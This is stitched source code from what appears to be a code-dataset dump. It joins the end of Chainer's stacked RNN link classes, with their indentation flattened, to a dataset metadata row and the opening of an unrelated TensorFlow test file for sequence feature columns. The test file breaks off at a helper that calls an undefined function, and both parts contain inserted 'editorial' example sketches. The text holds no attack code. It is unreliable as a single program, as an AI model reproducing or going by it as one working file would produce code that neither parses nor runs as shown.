class NStepRNNReLU(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Uni-directional RNN for sequences.
    This link is a stacked version of a uni-directional RNN for sequences.
    Note that the activation function is ``relu``.
    It calculates the hidden states of all layers at end-of-string,
    and all hidden states of the last layer for each time step.
    Unlike :func:`chainer.functions.n_step_rnn`, this link automatically
    sorts inputs in descending order by length and transposes the sequences.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_rnn`
"""
n_weights = 2
use_bi_direction = False
def rnn(self, *args):
return rnn.n_step_rnn(*args, activation='relu')
@property
def n_cells(self):
return 1
class NStepBiRNNTanh(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Bi-directional RNN for sequences.
    This link is a stacked version of a bi-directional RNN for sequences.
    Note that the activation function is ``tanh``.
    It calculates the hidden states of all layers at end-of-string,
    and all hidden states of the last layer for each time step.
    Unlike :func:`chainer.functions.n_step_birnn`, this link automatically
    sorts inputs in descending order by length and transposes the sequences.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_birnn`
"""
n_weights = 2
use_bi_direction = True
def rnn(self, *args):
return rnn.n_step_birnn(*args, activation='tanh')
@property
def n_cells(self):
return 1
class NStepBiRNNReLU(NStepRNNBase):
"""__init__(self, n_layers, in_size, out_size, dropout)
Stacked Bi-directional RNN for sequences.
    This link is a stacked version of a bi-directional RNN for sequences.
    Note that the activation function is ``relu``.
    It calculates the hidden states of all layers at end-of-string,
    and all hidden states of the last layer for each time step.
    Unlike :func:`chainer.functions.n_step_birnn`, this link automatically
    sorts inputs in descending order by length and transposes the sequences.
Users just need to call the link with a list of :class:`chainer.Variable`
holding sequences.
.. warning::
``use_cudnn`` argument is not supported anymore since v2.
Instead, use ``chainer.using_config('use_cudnn', use_cudnn)``.
See :func:`chainer.using_config`.
Args:
n_layers (int): Number of layers.
in_size (int): Dimensionality of input vectors.
out_size (int): Dimensionality of hidden states and output vectors.
dropout (float): Dropout ratio.
.. seealso::
:func:`chainer.functions.n_step_birnn`
"""
n_weights = 2
use_bi_direction = True
def rnn(self, *args):
return rnn.n_step_birnn(*args, activation='relu')
@property
def n_cells(self):
return 1
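# --- Illustrative sketch (editorial addition, not part of the original module).
# The bi-directional variants concatenate forward and backward states, so every
# per-step output carries 2 * out_size features; sizes below are hypothetical.
def _example_n_step_birnn_tanh():
    birnn = NStepBiRNNTanh(n_layers=1, in_size=4, out_size=3, dropout=0.0)
    xs = [variable.Variable(numpy.random.randn(5, 4).astype(numpy.float32))]
    hy, ys = birnn(None, xs)
    assert hy.shape == (2, 1, 3)   # n_layers * 2 directions, batch, out_size
    assert ys[0].shape == (5, 6)   # sequence length, 2 * out_size
    return hy, ys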
| mit | 7,793,916,110,784,992,000 | 32.710938 | 79 | 0.594515 | false |
jendap/tensorflow | tensorflow/contrib/feature_column/python/feature_column/sequence_feature_column_v2_test.py | 2 | 61575 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for sequential_feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
from absl.testing import parameterized
import numpy as np
from tensorflow.contrib.feature_column.python.feature_column import sequence_feature_column_v2 as sfc
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.feature_column.feature_column_v2_test import _TestStateManager
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
class SequenceFeaturesTest(test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args_a': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'sparse_input_args_b': {
# example 0, ids [1]
# example 1, ids [2, 0]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 2, 0),
'dense_shape': (2, 2)},
'expected_input_layer': [
# example 0, ids_a [2], ids_b [1]
[[5., 6., 14., 15., 16.], [0., 0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [2, 0]
[[1., 2., 17., 18., 19.], [3., 4., 11., 12., 13.]],],
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'sparse_input_args_a': {
# feature 0, ids [[2], [0, 1]]
# feature 1, ids [[0, 0], [1]]
'indices': (
(0, 0, 0), (0, 1, 0), (0, 1, 1),
(1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 0, 0, 1),
'dense_shape': (2, 2, 2)},
'sparse_input_args_b': {
# feature 0, ids [[1, 1], [1]]
# feature 1, ids [[2], [0]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (1, 1, 1, 2, 0),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
# feature 0, [a: 2, -, b: 1, 1], [a: 0, 1, b: 1, -]
[[5., 6., 14., 15., 16.], [2., 3., 14., 15., 16.]],
# feature 1, [a: 0, 0, b: 2, -], [a: 1, -, b: 0, -]
[[1., 2., 17., 18., 19.], [3., 4., 11., 12., 13.]]],
'expected_sequence_length': [2, 2]},
)
def test_embedding_column(
self, sparse_input_args_a, sparse_input_args_b, expected_input_layer,
expected_sequence_length):
sparse_input_a = sparse_tensor.SparseTensorValue(**sparse_input_args_a)
sparse_input_b = sparse_tensor.SparseTensorValue(**sparse_input_args_b)
vocabulary_size = 3
embedding_dimension_a = 2
embedding_values_a = (
(1., 2.), # id 0
(3., 4.), # id 1
(5., 6.) # id 2
)
embedding_dimension_b = 3
embedding_values_b = (
(11., 12., 13.), # id 0
(14., 15., 16.), # id 1
(17., 18., 19.) # id 2
)
def _get_initializer(embedding_dimension, embedding_values):
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
return _initializer
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a,
dimension=embedding_dimension_a,
initializer=_get_initializer(embedding_dimension_a, embedding_values_a))
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
embedding_column_b = fc.embedding_column(
categorical_column_b,
dimension=embedding_dimension_b,
initializer=_get_initializer(embedding_dimension_b, embedding_values_b))
# Test that columns are reordered alphabetically.
sequence_input_layer = sfc.SequenceFeatures(
[embedding_column_b, embedding_column_a])
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b,})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('sequence_features/aaa_embedding/embedding_weights:0',
'sequence_features/bbb_embedding/embedding_weights:0'),
tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values_a, global_vars[0].eval(session=sess))
self.assertAllEqual(embedding_values_b, global_vars[1].eval(session=sess))
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_embedding_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence embedding column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a, dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_embedding\. categorical_column must be of '
r'type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures([embedding_column_a])
_, _ = sequence_input_layer({'aaa': sparse_input})
def test_shared_embedding_column(self):
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [1]
# example 1, ids [2, 0]
indices=((0, 0), (1, 0), (1, 1)),
values=(1, 2, 0),
dense_shape=(2, 2))
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 4.), # id 1
(5., 6.) # id 2
)
def _get_initializer(embedding_dimension, embedding_values):
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
return _initializer
expected_input_layer = [
# example 0, ids_a [2], ids_b [1]
[[5., 6., 3., 4.], [0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [2, 0]
[[1., 2., 5., 6.], [3., 4., 1., 2.]],
]
expected_sequence_length = [1, 2]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
# Test that columns are reordered alphabetically.
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_b, categorical_column_a],
dimension=embedding_dimension,
initializer=_get_initializer(embedding_dimension, embedding_values))
sequence_input_layer = sfc.SequenceFeatures(shared_embedding_columns)
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('aaa_bbb_shared_embedding:0',),
tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_shared_embedding_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence shared embedding column."""
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = fc.categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_shared_embedding\. categorical_column must '
r'be of type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures(shared_embedding_columns)
_, _ = sequence_input_layer({'aaa': sparse_input_a,
'bbb': sparse_input_b})
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args_a': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'sparse_input_args_b': {
# example 0, ids [1]
# example 1, ids [1, 0]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 1, 0),
'dense_shape': (2, 2)},
'expected_input_layer': [
# example 0, ids_a [2], ids_b [1]
[[0., 0., 1., 0., 1.], [0., 0., 0., 0., 0.]],
# example 1, ids_a [0, 1], ids_b [1, 0]
[[1., 0., 0., 0., 1.], [0., 1., 0., 1., 0.]]],
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'sparse_input_args_a': {
# feature 0, ids [[2], [0, 1]]
# feature 1, ids [[0, 0], [1]]
'indices': (
(0, 0, 0), (0, 1, 0), (0, 1, 1),
(1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 0, 0, 1),
'dense_shape': (2, 2, 2)},
'sparse_input_args_b': {
# feature 0, ids [[1, 1], [1]]
# feature 1, ids [[1], [0]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (1, 1, 1, 1, 0),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
# feature 0, [a: 2, -, b: 1, 1], [a: 0, 1, b: 1, -]
[[0., 0., 1., 0., 2.], [1., 1., 0., 0., 1.]],
# feature 1, [a: 0, 0, b: 1, -], [a: 1, -, b: 0, -]
[[2., 0., 0., 0., 1.], [0., 1., 0., 1., 0.]]],
'expected_sequence_length': [2, 2]},
)
def test_indicator_column(
self, sparse_input_args_a, sparse_input_args_b, expected_input_layer,
expected_sequence_length):
sparse_input_a = sparse_tensor.SparseTensorValue(**sparse_input_args_a)
sparse_input_b = sparse_tensor.SparseTensorValue(**sparse_input_args_b)
vocabulary_size_a = 3
vocabulary_size_b = 2
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size_a)
indicator_column_a = fc.indicator_column(categorical_column_a)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size_b)
indicator_column_b = fc.indicator_column(categorical_column_b)
# Test that columns are reordered alphabetically.
sequence_input_layer = sfc.SequenceFeatures(
[indicator_column_b, indicator_column_a])
input_layer, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_indicator_column_with_non_sequence_categorical(self):
"""Tests that error is raised for non-sequence categorical column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = fc.categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column_a = fc.indicator_column(categorical_column_a)
with self.assertRaisesRegexp(
ValueError,
r'In indicator_column: aaa_indicator\. categorical_column must be of '
r'type SequenceCategoricalColumn to use SequenceFeatures\.'):
sequence_input_layer = sfc.SequenceFeatures([indicator_column_a])
_, _ = sequence_input_layer({'aaa': sparse_input})
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [0., 1]
# example 1, [10.]
'indices': ((0, 0), (0, 1), (1, 0)),
'values': (0., 1., 10.),
'dense_shape': (2, 2)},
'expected_input_layer': [
[[0.], [1.]],
[[10.], [0.]]],
'expected_sequence_length': [2, 1]},
{'testcase_name': '3D',
'sparse_input_args': {
# feature 0, ids [[20, 3], [5]]
# feature 1, ids [[3], [8]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (20., 3., 5., 3., 8.),
'dense_shape': (2, 2, 2)},
'expected_input_layer': [
[[20.], [3.], [5.], [0.]],
[[3.], [0.], [8.], [0.]]],
'expected_sequence_length': [2, 2]},
)
def test_numeric_column(
self, sparse_input_args, expected_input_layer, expected_sequence_length):
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa')
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, sequence_length = sequence_input_layer({'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [0., 1., 2., 3., 4., 5., 6., 7.]
# example 1, [10., 11., 12., 13.]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_input_layer': [
# The output of numeric_column._get_dense_tensor should be flattened.
[[0., 1., 2., 3.], [4., 5., 6., 7.]],
[[10., 11., 12., 13.], [0., 0., 0., 0.]]],
'expected_sequence_length': [2, 1]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, values [[0., 1., 2., 3.]], [[4., 5., 6., 7.]]
# example 1, [[10., 11., 12., 13.], []]
'indices': ((0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 0, 3),
(0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 1, 3),
(1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 0, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 4)},
'expected_input_layer': [
# The output of numeric_column._get_dense_tensor should be flattened.
[[0., 1., 2., 3.], [4., 5., 6., 7.]],
[[10., 11., 12., 13.], [0., 0., 0., 0.]]],
'expected_sequence_length': [2, 1]},
)
def test_numeric_column_multi_dim(
self, sparse_input_args, expected_input_layer, expected_sequence_length):
"""Tests SequenceFeatures for multi-dimensional numeric_column."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, sequence_length = sequence_input_layer({'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected_input_layer, input_layer.eval(session=sess))
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
def test_sequence_length_not_equal(self):
"""Tests that an error is raised when sequence lengths are not equal."""
# Input a with sequence_length = [2, 1]
sparse_input_a = sparse_tensor.SparseTensorValue(
indices=((0, 0), (0, 1), (1, 0)),
values=(0., 1., 10.),
dense_shape=(2, 2))
# Input b with sequence_length = [1, 1]
sparse_input_b = sparse_tensor.SparseTensorValue(
indices=((0, 0), (1, 0)),
values=(1., 10.),
dense_shape=(2, 2))
numeric_column_a = sfc.sequence_numeric_column('aaa')
numeric_column_b = sfc.sequence_numeric_column('bbb')
sequence_input_layer = sfc.SequenceFeatures(
[numeric_column_a, numeric_column_b])
_, sequence_length = sequence_input_layer({
'aaa': sparse_input_a, 'bbb': sparse_input_b})
with monitored_session.MonitoredSession() as sess:
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
r'\[Condition x == y did not hold element-wise:\] '
r'\[x \(sequence_features/aaa/sequence_length:0\) = \] \[2 1\] '
r'\[y \(sequence_features/bbb/sequence_length:0\) = \] \[1 1\]'):
sess.run(sequence_length)
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]]
# example 1, [[[10., 11.], [12., 13.]]]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_shape': [2, 2, 4]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, values [[0., 1., 2., 3.]], [[4., 5., 6., 7.]]
# example 1, [[10., 11., 12., 13.], []]
'indices': ((0, 0, 0), (0, 0, 1), (0, 0, 2), (0, 0, 3),
                        (0, 1, 0), (0, 1, 1), (0, 1, 2), (0, 1, 3),
(1, 0, 0), (1, 0, 1), (1, 0, 2), (1, 0, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 4)},
'expected_shape': [2, 2, 4]},
)
def test_static_shape_from_tensors_numeric(
self, sparse_input_args, expected_shape):
"""Tests that we return a known static shape when we have one."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
sequence_input_layer = sfc.SequenceFeatures([numeric_column])
input_layer, _ = sequence_input_layer({'aaa': sparse_input})
shape = input_layer.get_shape()
self.assertEqual(shape, expected_shape)
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected_shape': [4, 2, 3]},
{'testcase_name': '3D',
'sparse_input_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [0, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 0, 2),
'dense_shape': (4, 2, 2)},
'expected_shape': [4, 2, 3]}
)
def test_static_shape_from_tensors_indicator(
self, sparse_input_args, expected_shape):
"""Tests that we return a known static shape when we have one."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=3)
indicator_column = fc.indicator_column(categorical_column)
sequence_input_layer = sfc.SequenceFeatures([indicator_column])
input_layer, _ = sequence_input_layer({'aaa': sparse_input})
shape = input_layer.get_shape()
self.assertEqual(shape, expected_shape)
def test_compute_output_shape(self):
price1 = sfc.sequence_numeric_column('price1', shape=2)
price2 = sfc.sequence_numeric_column('price2')
with ops.Graph().as_default():
features = {
'price1': sparse_tensor.SparseTensor(
indices=[[0, 0, 0], [0, 0, 1],
[0, 1, 0], [0, 1, 1],
[1, 0, 0], [1, 0, 1],
[2, 0, 0], [2, 0, 1],
[3, 0, 0], [3, 0, 1]],
values=[0., 1., 10., 11., 100., 101., 200., 201., 300., 301.],
dense_shape=(4, 3, 2)),
'price2': sparse_tensor.SparseTensor(
indices=[[0, 0],
[0, 1],
[1, 0],
[2, 0],
[3, 0]],
values=[10., 11., 20., 30., 40.],
dense_shape=(4, 3))}
sequence_features = sfc.SequenceFeatures([price1, price2])
seq_input, seq_len = sequence_features(features)
self.assertEqual(
sequence_features.compute_output_shape((None, None)),
(None, None, 3))
self.evaluate(variables_lib.global_variables_initializer())
self.evaluate(lookup_ops.tables_initializer())
self.assertAllClose([[[0., 1., 10.], [10., 11., 11.], [0., 0., 0.]],
[[100., 101., 20.], [0., 0., 0.], [0., 0., 0.]],
[[200., 201., 30.], [0., 0., 0.], [0., 0., 0.]],
[[300., 301., 40.], [0., 0., 0.], [0., 0., 0.]]],
self.evaluate(seq_input))
self.assertAllClose([2, 1, 1, 1], self.evaluate(seq_len))
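# --- Illustrative sketch (editorial addition, not part of the original test file).
# Typical downstream use of the (dense_tensor, sequence_length) pair produced by
# SequenceFeatures: masking a Keras RNN with the returned lengths. The column names,
# sizes, and the availability of tf.keras in this build are assumptions.
def _example_sequence_features_with_rnn(features):
  import tensorflow as tf
  columns = [
      sfc.sequence_numeric_column('price'),
      fc.embedding_column(
          sfc.sequence_categorical_column_with_identity('id', num_buckets=10),
          dimension=4),
  ]
  sequence_input, sequence_length = sfc.SequenceFeatures(columns)(features)
  mask = tf.sequence_mask(sequence_length)
  return tf.keras.layers.LSTM(8)(sequence_input, mask=mask)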
class ConcatenateContextInputTest(test.TestCase, parameterized.TestCase):
"""Tests the utility fn concatenate_context_input."""
def test_concatenate_context_input(self):
seq_input = ops.convert_to_tensor(np.arange(12).reshape(2, 3, 2))
context_input = ops.convert_to_tensor(np.arange(10).reshape(2, 5))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
input_layer = sfc.concatenate_context_input(context_input, seq_input)
expected = np.array([
[[0, 1, 0, 1, 2, 3, 4], [2, 3, 0, 1, 2, 3, 4], [4, 5, 0, 1, 2, 3, 4]],
[[6, 7, 5, 6, 7, 8, 9], [8, 9, 5, 6, 7, 8, 9], [10, 11, 5, 6, 7, 8, 9]]
], dtype=np.float32)
with monitored_session.MonitoredSession() as sess:
output = sess.run(input_layer)
self.assertAllEqual(expected, output)
@parameterized.named_parameters(
{'testcase_name': 'rank_lt_3',
'seq_input_arg': np.arange(100).reshape(10, 10)},
{'testcase_name': 'rank_gt_3',
'seq_input_arg': np.arange(100).reshape(5, 5, 2, 2)}
)
def test_sequence_input_throws_error(self, seq_input_arg):
seq_input = ops.convert_to_tensor(seq_input_arg)
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError, 'sequence_input must have rank 3'):
sfc.concatenate_context_input(context_input, seq_input)
@parameterized.named_parameters(
{'testcase_name': 'rank_lt_2',
'context_input_arg': np.arange(100)},
{'testcase_name': 'rank_gt_2',
'context_input_arg': np.arange(100).reshape(5, 5, 4)}
)
def test_context_input_throws_error(self, context_input_arg):
context_input = ops.convert_to_tensor(context_input_arg)
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(ValueError, 'context_input must have rank 2'):
sfc.concatenate_context_input(context_input, seq_input)
def test_integer_seq_input_throws_error(self):
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
context_input = math_ops.cast(context_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(
TypeError, 'sequence_input must have dtype float32'):
sfc.concatenate_context_input(context_input, seq_input)
def test_integer_context_input_throws_error(self):
seq_input = ops.convert_to_tensor(np.arange(100).reshape(5, 5, 4))
context_input = ops.convert_to_tensor(np.arange(100).reshape(10, 10))
seq_input = math_ops.cast(seq_input, dtype=dtypes.float32)
with self.assertRaisesRegexp(
TypeError, 'context_input must have dtype float32'):
sfc.concatenate_context_input(context_input, seq_input)
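# --- Illustrative sketch (editorial addition, not part of the original test file).
# concatenate_context_input tiles each example's context vector across every time
# step and concatenates it to the per-step features, which is what the expected
# array in test_concatenate_context_input spells out. A NumPy restatement of that
# behavior, with hypothetical shapes:
def _example_concatenate_context_numpy():
  seq = np.arange(12, dtype=np.float32).reshape(2, 3, 2)        # (batch, time, d_seq)
  ctx = np.arange(10, dtype=np.float32).reshape(2, 5)           # (batch, d_ctx)
  tiled = np.tile(ctx[:, np.newaxis, :], (1, seq.shape[1], 1))  # (batch, time, d_ctx)
  return np.concatenate([seq, tiled], axis=-1)                  # (batch, time, d_seq + d_ctx)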
class DenseFeaturesTest(test.TestCase):
"""Tests DenseFeatures with sequence feature columns."""
def test_embedding_column(self):
"""Tests that error is raised for sequence embedding column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column_a = fc.embedding_column(
categorical_column_a, dimension=2)
with self.assertRaisesRegexp(
ValueError,
r'In embedding_column: aaa_embedding\. categorical_column must not be '
r'of type SequenceCategoricalColumn\.'):
input_layer = fc.DenseFeatures([embedding_column_a])
_ = input_layer({'aaa': sparse_input})
def test_indicator_column(self):
"""Tests that error is raised for sequence indicator column."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column_a = fc.indicator_column(categorical_column_a)
with self.assertRaisesRegexp(
ValueError,
r'In indicator_column: aaa_indicator\. categorical_column must not be '
r'of type SequenceCategoricalColumn\.'):
input_layer = fc.DenseFeatures([indicator_column_a])
_ = input_layer({'aaa': sparse_input})
def _assert_sparse_tensor_value(test_case, expected, actual):
_assert_sparse_tensor_indices_shape(test_case, expected, actual)
test_case.assertEqual(
np.array(expected.values).dtype, np.array(actual.values).dtype)
test_case.assertAllEqual(expected.values, actual.values)
